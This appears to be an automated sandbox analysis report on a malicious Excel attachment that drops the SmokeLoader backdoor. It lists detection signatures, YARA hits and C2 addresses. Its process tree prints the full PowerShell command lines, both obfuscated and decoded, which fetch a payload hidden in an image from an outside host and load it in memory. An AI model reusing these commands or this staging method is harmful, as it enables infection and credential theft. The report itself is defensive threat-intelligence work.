Edit tour

Windows Analysis Report
#20240627_Edlen_A.xls

Overview

General Information

Sample name:	#20240627_Edlen_A.xls
Analysis ID:	1448086
MD5:	74cb59a86f4df8375836fd2bc3bbfd08
SHA1:	11745387b652df3e64697fc430d207251fb70fdd
SHA256:	72701fd89271a881e14bfb170ee86d28f5c08fdb73f1be8c6904337c102bf7d7
Tags:	xls
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for domain / URL

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Yara detected SmokeLoader

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if browser processes are running

Checks if the current machine is a virtual machine (disk enumeration)

Connects to a pastebin service (likely for C&C)

Contains functionality to compare user and computer (likely to detect sandboxes)

Creates a thread in another existing process (thread injection)

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs new ROOT certificates

Maps a DLL or memory area into another process

Microsoft Office drops suspicious files

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Deletes files inside the Windows folder

Detected potential crypto function

Document contains Microsoft Equation 3.0 OLE entries

Document misses a certain OLE stream usually present in this Microsoft Office document type

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Excel Network Connections

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2772 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

WINWORD.EXE (PID: 1020 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3348 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 3420 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 3520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRwBCDgTreFIDgTreLwDgTrewDgTreDgDgTreMDgTreDgTre4DgTreC8DgTreNgDgTre1DgTreDEDgTreLgDgTre3DgTreDcDgTreMQDgTreuDgTreDYDgTreNDgTreDgTreuDgTreDgDgTreOQDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 3620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

RegAsm.exe (PID: 3912 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)

explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 4072 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3124 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 2128 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3196 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3208 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 3192 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3324 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 3388 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3352 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

taskeng.exe (PID: 4004 cmdline: taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

rugtucw (PID: 4036 cmdline: C:\Users\user\AppData\Roaming\rugtucw MD5: 8FE9545E9F72E460723F484C304314AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x693:$obj2: \objdata 0x67b:$obj3: \objupdate 0x656:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x693:$obj2: \objdata 0x67b:$obj3: \objupdate 0x656:$obj6: \objlink

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: powershell.exe PID: 3520	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3520	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xa48c0:$b2: ::FromBase64String( 0xa521f:$b2: ::FromBase64String( 0xa62fc:$b2: ::FromBase64String( 0xa6949:$b2: ::FromBase64String( 0xa712c:$b2: ::FromBase64String( 0xa76f8:$b2: ::FromBase64String( 0x172616:$b2: ::FromBase64String( 0xa4725:$b3: ::UTF8.GetString( 0xa5084:$b3: ::UTF8.GetString( 0xa6161:$b3: ::UTF8.GetString( 0xa67ae:$b3: ::UTF8.GetString( 0xa6f91:$b3: ::UTF8.GetString( 0xa755d:$b3: ::UTF8.GetString( 0x172480:$b3: ::UTF8.GetString( 0xfbc91:$s1: -join 0x105daf:$s1: -join 0xe66a:$s3: reverse 0xfce9:$s3: reverse 0xffb4:$s3: reverse 0x10655:$s3: reverse 0x10dfa:$s3: reverse
Process Memory Space: powershell.exe PID: 3620	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3620	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x61237:$b2: ::FromBase64String( 0x81a33:$b2: ::FromBase64String( 0x81ff4:$b2: ::FromBase64String( 0x8357f:$b2: ::FromBase64String( 0x8c004:$b2: ::FromBase64String( 0xadb02:$b2: ::FromBase64String( 0xc84a0:$b2: ::FromBase64String( 0x8d8017:$b2: ::FromBase64String( 0x8d8dc4:$b2: ::FromBase64String( 0x9a703d:$b2: ::FromBase64String( 0x9a75fd:$b2: ::FromBase64String( 0x9e8bf6:$b2: ::FromBase64String( 0x9eb977:$b2: ::FromBase64String( 0x9ec013:$b2: ::FromBase64String( 0xaee87b:$b2: ::FromBase64String( 0xed92c1:$b2: ::FromBase64String( 0xed9881:$b2: ::FromBase64String( 0x6109c:$b3: ::UTF8.GetString( 0x81898:$b3: ::UTF8.GetString( 0x81e59:$b3: ::UTF8.GetString( 0x833e4:$b3: ::UTF8.GetString(
Process Memory Space: explorer.exe PID: 3192	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 3324	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
